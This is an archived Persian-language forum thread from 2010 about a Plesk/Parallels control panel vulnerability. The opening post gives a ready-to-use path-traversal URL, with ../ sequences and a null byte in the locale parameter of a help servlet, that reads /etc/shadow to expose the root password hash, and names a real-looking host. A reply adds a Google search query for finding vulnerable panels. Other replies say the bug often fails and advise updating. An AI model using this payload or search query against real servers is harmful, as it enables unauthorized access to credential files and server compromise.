PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : معرفی باگ خطرناک در Plesk



Masoud.B
May 21st, 2010, 02:34
دوستان این باگ رو من مدتیه میدونم خواستم بهتون معرفی کنم تا مواظب باشید

کافیه بعد از صفحه لوگین (https://www.cp.ewdx.com/single.html)

این را اضافه کنید: servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00

مثال :

https://www.cp.ewdx.com/servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00میبینید که پسورد hash شده روت رو نشون میده

هدف فقط اطلاع رسانی بود

منبع: Ashiyane (http://www.ashiyane.org/forums/)

TukaNet
May 21st, 2010, 03:28
روی پلسک 9 ویندوزی که کار نکرد !

Masoud.B
May 21st, 2010, 03:39
روی پلسک 9 ویندوزی که کار نکرد !


با یکم کم و زیاد کردن ../ کار میکنه البته درسته همش نمیشه ، تو گوگل اینو سرچ کنید کلی ازین سایت ها میاد که باگ داره : intitle:Parallels® Automation inurl:https://cp

Arashdn
May 21st, 2010, 07:53
پلسک خیلی به امنیتش افتخار میکرد
چطور شد چنین باگ هایی رو پیدا کردین؟
کسی خودش تست کرده رو پلسک؟؟

Veria
May 21st, 2010, 10:51
روی بعضی ورژن ها بعضی وقتها جواب میده (بیشتر وقتها ارور میده) اما خروجی هم به این سادگی ها قابل استفاده نیست.
به هر حال بهتره آپدیت کنید.